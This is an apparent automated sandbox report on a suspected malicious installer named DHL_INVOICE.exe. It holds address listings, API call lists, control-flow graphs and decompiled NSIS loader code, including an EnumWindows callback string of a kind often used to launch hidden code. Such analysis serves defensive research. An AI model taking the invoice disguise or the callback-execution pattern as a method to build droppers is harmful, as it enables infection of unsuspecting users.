                                                                            0x00402dad
                                                                            0x00402dbf
                                                                            0x00402dc6
                                                                            0x00402dc7
                                                                            0x00402daf
                                                                            0x00402daf
                                                                            0x00402db3
                                                                            0x00402db3
                                                                            0x00000000
                                                                            0x00402dad
                                                                            0x00402d81
                                                                            0x00402d85
                                                                            0x00402d9a
                                                                            0x00402b21
                                                                            0x00402b21
                                                                            0x00402b22
                                                                            0x00000000
                                                                            0x00402b22
                                                                            0x00402d8f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402dd1
                                                                            0x00402dd5
                                                                            0x00402dd5
                                                                            0x00402dd7
                                                                            0x00402e2c
                                                                            0x00402e2e
                                                                            0x00402e33
                                                                            0x00402e35
                                                                            0x00402e72
                                                                            0x00402e74
                                                                            0x00402e75
                                                                            0x00402e77
                                                                            0x00000000
                                                                            0x00402e77
                                                                            0x00402e37
                                                                            0x00402e3b
                                                                            0x00402e3c
                                                                            0x00402e3d
                                                                            0x00402e43
                                                                            0x00402e45
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402e47
                                                                            0x00402e4b
                                                                            0x00402e4c
                                                                            0x00402e4d
                                                                            0x00402e51
                                                                            0x00402e55
                                                                            0x00402e56
                                                                            0x00402e58
                                                                            0x00402e5a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402e61
                                                                            0x00402e66
                                                                            0x00402e6a
                                                                            0x00000000
                                                                            0x00402e6a
                                                                            0x00402dd9
                                                                            0x00402dd9
                                                                            0x00402ddc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402deb
                                                                            0x00402ded
                                                                            0x00402df3
                                                                            0x00402df7
                                                                            0x00402dfa
                                                                            0x00402dff
                                                                            0x00402e01
                                                                            0x00402e06
                                                                            0x00402e11
                                                                            0x00402e16
                                                                            0x00402e1a
                                                                            0x004016b7
                                                                            0x004016b7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402e7c
                                                                            0x00402e88
                                                                            0x00402e8e
                                                                            0x00402e92
                                                                            0x00402e9b
                                                                            0x00402e9b
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                            • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                                                            • SetForegroundWindow.USER32 ref: 00401634
                                                                            • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                            • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                            • SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                            • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\mnstring\Forcible,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 004017A3
                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                            • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 00401920
                                                                            • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\mnstring\Forcible,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                            • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                                                            • lstrcatW.KERNEL32(Call,00000000), ref: 00401A82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\mnstring\Forcible$C:\Users\user\AppData\Local\Temp\nsaE104.tmp$C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll$Call$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 3895412863-2020029727
                                                                            • Opcode ID: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
                                                                            • Instruction ID: 8c1cf908ae02b995a3a41f7ffac76b054db7533a66b8d62ade7f549c41348504
                                                                            • Opcode Fuzzy Hash: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
                                                                            • Instruction Fuzzy Hash: 38D10870604301BBD710AF26CD85E2B76A8EF85359F204A3FF452B62E1D77CD9019A6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 567 4033ed-40343a GetTickCount GetModuleFileNameW call 40691b 570 403446-403476 call 406b1a call 406d10 call 406b1a GetFileSize 567->570 571 40343c-403441 567->571 579 403572-403581 call 403389 570->579 580 40347c 570->580 572 403645-40364c 571->572 586 403640 579->586 587 403587-403589 579->587 582 403480-4034a6 call 40311b 580->582 588 403638-40363f call 403389 582->588 589 4034ac-4034b3 582->589 586->572 590 4035ba-4035ea GlobalAlloc call 403131 call 403148 587->590 591 40358b-4035a3 call 403131 call 406948 587->591 588->586 592 403534-403537 589->592 593 4034b5-4034ce call 4066b4 589->593 590->586 618 4035ec-4035fe 590->618 609 4035a8-4035aa 591->609 601 403541-403547 592->601 602 403539-403540 call 403389 592->602 593->601 612 4034d0-4034d8 593->612 604 403549-403558 call 406e3c 601->604 605 40355c-403564 601->605 602->601 604->605 605->582 614 40356a-40356e 605->614 609->586 615 4035b0-4035b4 609->615 612->601 617 4034da-4034e2 612->617 614->579 615->586 615->590 617->601 619 4034e4-4034ec 617->619 620 403600 618->620 621 403606-403609 618->621 619->601 622 4034ee-4034f6 619->622 620->621 623 40360c-403614 621->623 622->601 624 4034f8-403517 622->624 623->623 625 403616-40362f SetFilePointer call 4066b4 623->625 624->586 626 40351d-403523 624->626 629 403634-403636 625->629 626->614 628 403525-40352e 626->628 628->601 630 403530-403532 628->630 629->572 630->601
                                                                            C-Code - Quality: 98%
                                                                            			E004033ED(void* __eflags, signed int _a4) {
                                                                            				char _v0;
                                                                            				intOrPtr _v4;
                                                                            				long _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				signed int _v28;
                                                                            				long _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				intOrPtr _v44;
                                                                            				long _t35;
                                                                            				void* _t45;
                                                                            				intOrPtr* _t49;
                                                                            				long _t50;
                                                                            				void* _t56;
                                                                            				intOrPtr _t64;
                                                                            				struct HINSTANCE__* _t70;
                                                                            				signed int _t72;
                                                                            				void* _t73;
                                                                            				void* _t76;
                                                                            				intOrPtr _t78;
                                                                            				long _t80;
                                                                            				long _t83;
                                                                            				long _t86;
                                                                            				void* _t87;
                                                                            				void* _t88;
                                                                            
                                                                            				_t80 = 0;
                                                                            				_t70 = 0;
                                                                            				_v32 = 0;
                                                                            				_v36 = 0;
                                                                            				_t35 = GetTickCount();
                                                                            				_t84 = L"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe";
                                                                            				 *0x435a00 = _t35 + 0x3e8;
                                                                            				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\DHL_INVOICE.exe", 0x400);
                                                                            				_t88 = E0040691B(_t84, 0x80000000, 3);
                                                                            				 *0x40b010 = _t88;
                                                                            				if(_t88 == 0xffffffff) {
                                                                            					return L"Error launching installer";
                                                                            				}
                                                                            				_t85 = L"C:\\Users\\Arthur\\Desktop";
                                                                            				E00406B1A(L"C:\\Users\\Arthur\\Desktop", _t84);
                                                                            				E00406B1A(0x444000, E00406D10(_t85));
                                                                            				_t86 = GetFileSize(_t88, 0);
                                                                            				 *0x40d968 = _t86;
                                                                            				if(_t86 == 0) {
                                                                            					L21:
                                                                            					E00403389(1);
                                                                            					_pop(_t73);
                                                                            					if( *0x435a08 == 0) {
                                                                            						L32:
                                                                            						return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                            					}
                                                                            					if(_t70 == 0) {
                                                                            						L25:
                                                                            						_t45 = GlobalAlloc(0x40, _v8); // executed
                                                                            						_t87 = _t45;
                                                                            						E00403131( *0x435a08 + 0x1c);
                                                                            						if(E00403148(0xffffffff, 0, _t87, _v12) != _v28) {
                                                                            							goto L32;
                                                                            						}
                                                                            						 *0x435a10 = _t87;
                                                                            						 *0x435a0c =  *_t87;
                                                                            						if((_v28 & 0x00000001) != 0) {
                                                                            							 *0x435a04 =  *0x435a04 + 1;
                                                                            						}
                                                                            						_t76 = 8;
                                                                            						_t31 = _t87 + 0x44; // 0x44
                                                                            						_t49 = _t31;
                                                                            						do {
                                                                            							_t49 = _t49 - 8;
                                                                            							 *_t49 =  *_t49 + _t87;
                                                                            							_t76 = _t76 - 1;
                                                                            						} while (_t76 != 0);
                                                                            						_t50 = SetFilePointer(_t88, 0, 0, 1); // executed
                                                                            						 *(_t87 + 0x3c) = _t50;
                                                                            						_t34 = _t87 + 4; // 0x4
                                                                            						E004066B4(0x435a20, _t34, 0x40);
                                                                            						return 0;
                                                                            					}
                                                                            					E00403131( *0x40d96c);
                                                                            					_t56 = E00406948(_t73,  *0x40b010,  &_v0, 4); // executed
                                                                            					if(_t56 == 0 || _t80 != _a4) {
                                                                            						goto L32;
                                                                            					} else {
                                                                            						goto L25;
                                                                            					}
                                                                            				}
                                                                            				_t72 = _a4;
                                                                            				while(1) {
                                                                            					_t82 =  !=  ? 0x8000 : 0x200;
                                                                            					_t83 =  <  ? _t86 :  !=  ? 0x8000 : 0x200;
                                                                            					if(E0040311B(0x417538, 0x200) == 0) {
                                                                            						break;
                                                                            					}
                                                                            					if( *0x435a08 != 0) {
                                                                            						if((_t72 & 0x00000002) == 0) {
                                                                            							E00403389(0);
                                                                            						}
                                                                            						L17:
                                                                            						if(_t86 <  *0x40d968) {
                                                                            							_v44 = E00406E3C(_v32, 0x417538, _t83);
                                                                            						}
                                                                            						 *0x40d96c =  *0x40d96c + _t83;
                                                                            						_t86 = _t86 - _t83;
                                                                            						if(_t86 != 0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							L20:
                                                                            							_t80 = _v32;
                                                                            							_t22 =  &_v36; // 0x417538
                                                                            							_t70 =  *_t22;
                                                                            							goto L21;
                                                                            						}
                                                                            					}
                                                                            					E004066B4( &_v28, 0x417538, 0x1c);
                                                                            					if((_v40 & 0xfffffff0) == 0 && _v24 == 0xdeadbeef && _v12 == 0x74736e49 && _v16 == 0x74666f73 && _v20 == 0x6c6c754e) {
                                                                            						_t64 =  *0x40d96c; // 0x9a79d
                                                                            						_t72 = _t72 | _v28;
                                                                            						_t78 = _v4;
                                                                            						 *0x435a08 = _t64;
                                                                            						 *0x435ae0 =  *0x435ae0 | _t72 & 0x00000002;
                                                                            						if(_t78 > _t86) {
                                                                            							goto L32;
                                                                            						}
                                                                            						if((_t72 & 0x0000000c) == 4) {
                                                                            							goto L20;
                                                                            						}
                                                                            						_v36 = _v36 + 1;
                                                                            						_t86 = _t78 - 4;
                                                                            						if(0x200 > _t86) {
                                                                            							_t83 = _t86;
                                                                            						}
                                                                            					}
                                                                            					goto L17;
                                                                            				}
                                                                            				E00403389(1);
                                                                            				goto L32;
                                                                            			}































                                                                            0x004033f4
                                                                            0x004033f6
                                                                            0x004033f8
                                                                            0x004033fc
                                                                            0x00403400
                                                                            0x0040340b
                                                                            0x00403417
                                                                            0x0040341c
                                                                            0x0040342f
                                                                            0x00403431
                                                                            0x0040343a
                                                                            0x00000000
                                                                            0x0040343c
                                                                            0x00403447
                                                                            0x0040344d
                                                                            0x0040345e
                                                                            0x0040346c
                                                                            0x0040346e
                                                                            0x00403476
                                                                            0x00403572
                                                                            0x00403574
                                                                            0x00403580
                                                                            0x00403581
                                                                            0x00403640
                                                                            0x00000000
                                                                            0x00403640
                                                                            0x00403589
                                                                            0x004035ba
                                                                            0x004035c0
                                                                            0x004035cc
                                                                            0x004035d2
                                                                            0x004035ea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004035f1
                                                                            0x004035f9
                                                                            0x004035fe
                                                                            0x00403600
                                                                            0x00403600
                                                                            0x00403608
                                                                            0x00403609
                                                                            0x00403609
                                                                            0x0040360c
                                                                            0x0040360c
                                                                            0x0040360f
                                                                            0x00403611
                                                                            0x00403611
                                                                            0x0040361b
                                                                            0x00403621
                                                                            0x00403624
                                                                            0x0040362f
                                                                            0x00000000
                                                                            0x00403634
                                                                            0x00403591
                                                                            0x004035a3
                                                                            0x004035aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004035aa
                                                                            0x0040347c
                                                                            0x00403480
                                                                            0x00403491
                                                                            0x00403496
                                                                            0x004034a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004034b3
                                                                            0x00403537
                                                                            0x0040353b
                                                                            0x00403540
                                                                            0x00403541
                                                                            0x00403547
                                                                            0x00403558
                                                                            0x00403558
                                                                            0x0040355c
                                                                            0x00403562
                                                                            0x00403564
                                                                            0x00000000
                                                                            0x0040356a
                                                                            0x0040356a
                                                                            0x0040356a
                                                                            0x0040356e
                                                                            0x0040356e
                                                                            0x00000000
                                                                            0x0040356e
                                                                            0x00403564
                                                                            0x004034c1
                                                                            0x004034ce
                                                                            0x004034f8
                                                                            0x004034fd
                                                                            0x00403501
                                                                            0x00403505
                                                                            0x0040350f
                                                                            0x00403517
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403523
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403525
                                                                            0x00403529
                                                                            0x0040352e
                                                                            0x00403530
                                                                            0x00403530
                                                                            0x0040352e
                                                                            0x00000000
                                                                            0x004034ce
                                                                            0x0040363a
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403400
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_INVOICE.exe,00000400,?,?,?,?,?), ref: 0040341C
                                                                              • Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\DHL_INVOICE.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                                                              • Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_INVOICE.exe,C:\Users\user\Desktop\DHL_INVOICE.exe,80000000,00000003,?,?,?,?,?), ref: 00403466
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 004035C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: 8uA$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_INVOICE.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-410004942
                                                                            • Opcode ID: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
                                                                            • Instruction ID: 38a706e546d8de2da2def33f7086105d1948706aa1bd56b4a23ee49e5693a868
                                                                            • Opcode Fuzzy Hash: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
                                                                            • Instruction Fuzzy Hash: 0A51B171504310BFD720AF21DD81B1B7BA8AB4471AF10093FFA55B72E1C7789A848BAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 631 405eba-405ec3 632 405ec5-405ed4 631->632 633 405ed6-405ef1 631->633 632->633 634 405ef3-405efe 633->634 635 405f08-405f0f 633->635 634->635 636 405f00-405f04 634->636 637 406103-40610a 635->637 638 405f15-405f18 635->638 636->635 640 406115 637->640 641 40610c-406113 call 406b1a 637->641 639 405f19-405f27 638->639 642 405f2d-405f38 639->642 643 4060fe-406102 639->643 645 406117-40611d 640->645 641->645 646 4060d7 642->646 647 405f3e-405f82 642->647 643->637 649 4060e5 646->649 650 4060d9-4060e3 646->650 651 406082-406085 647->651 652 405f88-405f99 647->652 653 4060e8 649->653 650->653 654 406087-40608a 651->654 655 4060bb-4060be 651->655 656 405fd9-405fdc 652->656 657 405f9b-405fc7 call 406977 652->657 660 4060ea-4060f8 653->660 658 40609a-4060b1 call 406b1a 654->658 659 40608c-406098 call 40661f 654->659 662 4060c0-4060c4 call 405eba 655->662 663 4060c9-4060d5 lstrlenW 655->663 664 405fec-405fef 656->664 665 405fde-405fea GetSystemDirectoryW 656->665 677 405fcd-405fd4 call 405eba 657->677 678 40605e-406063 657->678 658->663 679 4060b3-4060b9 call 406d3d 658->679 659->663 660->639 660->643 662->663 663->660 667 405ff1-405ffd GetWindowsDirectoryW 664->667 668 405fff-406007 664->668 666 40605a 665->666 666->678 667->666 673 406009-406012 668->673 674 40601e-406034 668->674 684 40601a-40601c 673->684 690 406051-406058 674->690 691 406036-40604f SHGetPathFromIDListW CoTaskMemFree 674->691 677->678 681 406065-406068 678->681 682 406076-406080 call 406d3d 678->682 679->663 681->682 688 40606a-406070 lstrcatW 681->688 682->663 684->666 684->674 688->682 690->666 690->668 691->666 691->690
                                                                            C-Code - Quality: 69%
                                                                            			E00405EBA() {
                                                                            				signed int _t33;
                                                                            				WCHAR* _t35;
                                                                            				void* _t39;
                                                                            				void* _t40;
                                                                            				short _t41;
                                                                            				signed int _t46;
                                                                            				void* _t48;
                                                                            				int _t49;
                                                                            				void* _t58;
                                                                            				signed int _t59;
                                                                            				signed int _t60;
                                                                            				signed int _t65;
                                                                            				WCHAR* _t78;
                                                                            				signed char* _t80;
                                                                            				signed int _t84;
                                                                            				signed int _t85;
                                                                            				WCHAR* _t90;
                                                                            				short _t91;
                                                                            				WCHAR* _t93;
                                                                            				void* _t96;
                                                                            				signed int _t101;
                                                                            				signed int _t103;
                                                                            				signed char* _t107;
                                                                            				signed int _t110;
                                                                            				void* _t111;
                                                                            
                                                                            				_t33 =  *(_t111 + 8);
                                                                            				if(_t33 < 0) {
                                                                            					_t33 =  *( *0x4349e0 - 4 + _t33 * 4);
                                                                            				}
                                                                            				_t90 = 0x4339a0;
                                                                            				_t78 =  *(_t111 + 0x1c);
                                                                            				_t107 =  *0x435a38 + _t33 * 2;
                                                                            				_t93 = 0x4339a0;
                                                                            				if(_t78 >= 0x4339a0 && _t78 - 0x4339a0 >> 1 < 0x800) {
                                                                            					_t93 = _t78;
                                                                            					_t78 = 0;
                                                                            					 *((intOrPtr*)(_t111 + 0x24)) = 0;
                                                                            				}
                                                                            				_t84 =  *_t107 & 0x0000ffff;
                                                                            				if(_t84 == 0) {
                                                                            					L41:
                                                                            					 *_t93 = 0;
                                                                            					if(_t78 == 0) {
                                                                            						_t35 = _t90;
                                                                            					} else {
                                                                            						_t35 = E00406B1A(_t78, _t90);
                                                                            					}
                                                                            					return _t35;
                                                                            				} else {
                                                                            					_t96 = 2;
                                                                            					while(1) {
                                                                            						_t80 = _t107;
                                                                            						if((_t93 - _t90 & 0xfffffffe) >= 0x800) {
                                                                            							break;
                                                                            						}
                                                                            						_t91 = _t84 & 0x0000ffff;
                                                                            						_t107 =  &(_t107[_t96]);
                                                                            						_t39 = 4;
                                                                            						if(_t91 >= _t39) {
                                                                            							if(__eflags != 0) {
                                                                            								 *_t93 = _t91;
                                                                            							} else {
                                                                            								_t41 =  *_t107;
                                                                            								_t107 =  &(_t80[4]);
                                                                            								 *_t93 = _t41;
                                                                            							}
                                                                            							_t40 = _t96;
                                                                            							L39:
                                                                            							_t84 =  *_t107 & 0x0000ffff;
                                                                            							_t93 = _t93 + _t40;
                                                                            							_t90 = 0x4339a0;
                                                                            							if(_t84 != 0) {
                                                                            								continue;
                                                                            							}
                                                                            							break;
                                                                            						}
                                                                            						_t85 =  *_t107 & 0x000000ff;
                                                                            						_t101 = (_t80[3] & 0x0000007f) << 0x00000007 |  *_t107 & 0x0000007f;
                                                                            						 *(_t111 + 0x18) = _t85;
                                                                            						 *(_t111 + 0x14) = _t85 | 0x00008000;
                                                                            						_t46 = _t107[1] & 0x000000ff;
                                                                            						_t107 =  &(_t80[4]);
                                                                            						 *(_t111 + 0x20) = _t46;
                                                                            						 *(_t111 + 0x20) = _t46 | 0x00008000;
                                                                            						_t48 = 2;
                                                                            						 *(_t111 + 0x10) = _t107;
                                                                            						if(_t91 != _t48) {
                                                                            							__eflags = _t91 - 3;
                                                                            							if(_t91 != 3) {
                                                                            								__eflags = _t91 - 1;
                                                                            								if(__eflags == 0) {
                                                                            									_push( !_t101);
                                                                            									_push(_t93);
                                                                            									E00405EBA();
                                                                            								}
                                                                            							} else {
                                                                            								__eflags = _t101 - 0x1d;
                                                                            								if(__eflags != 0) {
                                                                            									E00406B1A(_t93, L"user32::EnumWindows(i r1 ,i 0)" + (_t101 << 0xb));
                                                                            									__eflags = _t101 - 0x15 - 7;
                                                                            									if(__eflags < 0) {
                                                                            										E00406D3D(_t93);
                                                                            									}
                                                                            								} else {
                                                                            									E0040661F(_t93,  *0x4349f8);
                                                                            								}
                                                                            							}
                                                                            							L34:
                                                                            							_t49 = lstrlenW(_t93);
                                                                            							_t40 = _t49 + _t49;
                                                                            							_t96 = 2;
                                                                            							goto L39;
                                                                            						}
                                                                            						_t58 = 4;
                                                                            						_t110 =  !=  ? _t58 : _t48;
                                                                            						_t121 = _t85;
                                                                            						if(_t85 >= 0) {
                                                                            							__eflags = _t85 - 0x25;
                                                                            							if(_t85 != 0x25) {
                                                                            								__eflags = _t85 - 0x24;
                                                                            								if(_t85 != 0x24) {
                                                                            									do {
                                                                            										_t59 =  *0x4349f0;
                                                                            										_t110 = _t110 - 1;
                                                                            										__eflags = _t59;
                                                                            										if(_t59 == 0) {
                                                                            											L19:
                                                                            											_t60 = _t111 + 0x2c;
                                                                            											_push(_t60);
                                                                            											_push( *((intOrPtr*)(_t111 + 0x18 + _t110 * 4)));
                                                                            											_push( *0x4349f8);
                                                                            											L0040802C();
                                                                            											__eflags = _t60;
                                                                            											if(_t60 != 0) {
                                                                            												goto L21;
                                                                            											}
                                                                            											__imp__SHGetPathFromIDListW( *((intOrPtr*)(_t111 + 0x30)), _t93);
                                                                            											__imp__CoTaskMemFree( *(_t111 + 0x2c));
                                                                            											__eflags = _t60;
                                                                            											if(_t60 != 0) {
                                                                            												break;
                                                                            											}
                                                                            											goto L21;
                                                                            										}
                                                                            										_t65 =  *_t59( *0x4349f8,  *((intOrPtr*)(_t111 + 0x20 + _t110 * 4)), 0, 0, _t93); // executed
                                                                            										__eflags = _t65;
                                                                            										if(_t65 == 0) {
                                                                            											break;
                                                                            										}
                                                                            										goto L19;
                                                                            										L21:
                                                                            										 *_t93 = 0;
                                                                            										__eflags = _t110;
                                                                            									} while (_t110 != 0);
                                                                            									L22:
                                                                            									_t103 =  *(_t111 + 0x20);
                                                                            									goto L23;
                                                                            								}
                                                                            								GetWindowsDirectoryW(_t93, 0x400);
                                                                            								goto L22;
                                                                            							}
                                                                            							GetSystemDirectoryW(_t93, 0x400);
                                                                            							goto L22;
                                                                            						} else {
                                                                            							E00406977(_t85 & 0x0000003f, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x435a38 + (_t85 & 0x0000003f) * 2, _t93, _t85 & 0x00000040);
                                                                            							_t103 =  *(_t111 + 0x20);
                                                                            							if( *_t93 == 0) {
                                                                            								_push(_t103);
                                                                            								_push(_t93);
                                                                            								E00405EBA();
                                                                            							}
                                                                            							L23:
                                                                            							if( *_t93 != 0 && _t103 == 0x1a) {
                                                                            								lstrcatW(_t93, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                            							}
                                                                            							E00406D3D(_t93);
                                                                            							_t107 =  *(_t111 + 0x10);
                                                                            							goto L34;
                                                                            						}
                                                                            					}
                                                                            					_t78 =  *(_t111 + 0x28);
                                                                            					goto L41;
                                                                            				}
                                                                            			}




























                                                                            0x00405eba
                                                                            0x00405ec3
                                                                            0x00405ed4
                                                                            0x00405ed4
                                                                            0x00405edc
                                                                            0x00405ee2
                                                                            0x00405ee7
                                                                            0x00405eed
                                                                            0x00405ef1
                                                                            0x00405f00
                                                                            0x00405f02
                                                                            0x00405f04
                                                                            0x00405f04
                                                                            0x00405f08
                                                                            0x00405f0f
                                                                            0x00406103
                                                                            0x00406105
                                                                            0x0040610a
                                                                            0x00406115
                                                                            0x0040610c
                                                                            0x0040610e
                                                                            0x0040610e
                                                                            0x0040611d
                                                                            0x00405f15
                                                                            0x00405f18
                                                                            0x00405f19
                                                                            0x00405f1b
                                                                            0x00405f27
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f2f
                                                                            0x00405f32
                                                                            0x00405f34
                                                                            0x00405f38
                                                                            0x004060d7
                                                                            0x004060e5
                                                                            0x004060d9
                                                                            0x004060d9
                                                                            0x004060dd
                                                                            0x004060e0
                                                                            0x004060e0
                                                                            0x004060e8
                                                                            0x004060ea
                                                                            0x004060ea
                                                                            0x004060ee
                                                                            0x004060f0
                                                                            0x004060f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004060f8
                                                                            0x00405f49
                                                                            0x00405f53
                                                                            0x00405f55
                                                                            0x00405f60
                                                                            0x00405f64
                                                                            0x00405f68
                                                                            0x00405f6b
                                                                            0x00405f76
                                                                            0x00405f7a
                                                                            0x00405f7b
                                                                            0x00405f82
                                                                            0x00406082
                                                                            0x00406085
                                                                            0x004060bb
                                                                            0x004060be
                                                                            0x004060c2
                                                                            0x004060c3
                                                                            0x004060c4
                                                                            0x004060c4
                                                                            0x00406087
                                                                            0x00406087
                                                                            0x0040608a
                                                                            0x004060a6
                                                                            0x004060ae
                                                                            0x004060b1
